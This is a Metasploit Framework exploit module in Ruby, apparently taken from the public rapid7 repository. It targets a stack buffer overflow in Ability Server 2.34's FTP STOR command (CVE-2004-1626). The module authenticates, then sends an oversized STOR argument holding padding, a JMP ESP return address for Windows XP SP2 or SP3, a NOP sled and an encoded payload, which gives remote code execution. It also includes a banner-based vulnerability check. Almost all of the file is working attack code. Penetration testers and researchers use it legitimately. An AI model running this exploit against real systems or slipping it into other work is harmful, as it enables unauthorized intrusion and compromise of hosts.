GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/ability_server_stor.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
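class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  # Module metadata.
  #
  # Both targets share the same 966-byte distance from the start of the STOR
  # argument to the saved return address; they differ only in which module
  # supplies the JMP ESP gadget. The raw offset is corrected at runtime in
  # #exploit for the length of the client IP and FTP username.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ability Server 2.34 STOR Command Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow in Ability Server 2.34.
          Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,
          which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.

          The vulnerability has been confirmed on version 2.34 and has also been reported
          in version 2.25 and 2.32. Other versions may also be affected.
        },
        'Author' => [
          'muts', # Initial discovery
          'Dark Eagle', # same as muts
          'Peter Osterberg' # Metasploit
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-1626' ],
          [ 'OSVDB', '11030'],
          [ 'EDB', '588'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process'
        },
        'Privileged' => false,
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00\xff"
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows XP SP2 ENG',
            {
              # JMP ESP (MFC42.dll. Addr remains unchanged until a patched SP3)
              'Ret' => 0x73E32ECF,
              'Offset' => 966
            }
          ],
          [
            'Windows XP SP3 ENG',
            {
              # JMP ESP (USER32.dll. Unchanged from unpatched SP3 through fully patched SP3)
              'Ret' => 0x7E429353,
              'Offset' => 966
            }
          ],
        ],
        'DisclosureDate' => '2004-10-22',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(21),
        OptString.new('FTPUSER', [ true, 'Valid FTP username', 'ftp' ], fallbacks: ['USERNAME']),
        OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'ftp' ], fallbacks: ['PASSWORD'])
      ]
    )
  end

  # Fingerprint the service from its FTP banner only; no STOR is sent.
  #
  # Returns Appears for the version the module was confirmed against,
  # Detected for any other Ability Server banner, and Unknown otherwise.
  # A banner that does not mention Ability Server (or an empty/suppressed
  # banner) does not prove the host is unaffected, so Safe is deliberately
  # never returned: that code tells an operator the target can be skipped.
  def check
    connect
    disconnect
    ident = banner.to_s

    # 2.34 is the version the offsets were derived from.
    return Exploit::CheckCode::Appears if ident =~ /Ability Server 2\.34/

    # 2.25 and 2.32 are reported affected too, but the targets were not
    # verified against them, so only report that the product is present.
    return Exploit::CheckCode::Detected if ident =~ /Ability Server/

    Exploit::CheckCode::Unknown
  end

  # Authenticate and send one oversized STOR argument laid out as:
  #
  #   [padding][ret = JMP ESP][32 NOPs][encoded payload][trailing filler]
  #
  # The padding is corrected for the lengths of the client IP and the FTP
  # username, since the target 'Offset' was measured with a 13-character IP
  # and a 3-character username. Aborts with BadConfig if those corrections
  # leave no padding at all, rather than sending a buffer that cannot land.
  def exploit
    return unless connect_login

    # Address the server is assumed to see for this client. LHOST is used
    # when set (as the original author did); an unset or wildcard LHOST
    # (e.g. bind payloads) falls back to the local address routed to the
    # target instead of raising on nil. NOTE(review): behind NAT the address
    # the server records may still differ from both, which skews the offset.
    lhost = datastore['LHOST'].to_s
    myhost = if lhost.empty? || lhost == '0.0.0.0'
               Rex::Socket.source_address(rhost)
             else
               lhost
             end

    # Take client ip + ftp user lengths into account for EIP offset
    padd_size = target['Offset'] + (13 - myhost.length) + (3 - datastore['FTPUSER'].length)
    if padd_size <= 0
      fail_with(Failure::BadConfig, "LHOST/FTPUSER too long for the fixed offset (padding would be #{padd_size})")
    end

    # Build into a fresh buffer rather than appending onto the padding string.
    buf = ''
    buf << rand_text_alpha(padd_size)
    buf << [target.ret].pack('V')       # overwrites the saved EIP with JMP ESP
    buf << make_nops(32)                # slide from ESP into the payload
    buf << payload.encoded
    buf << rand_text_alpha(buf.length)  # extend the overflow well past the frame

    send_cmd(['STOR', buf], false)
    handler
    disconnect
  end
end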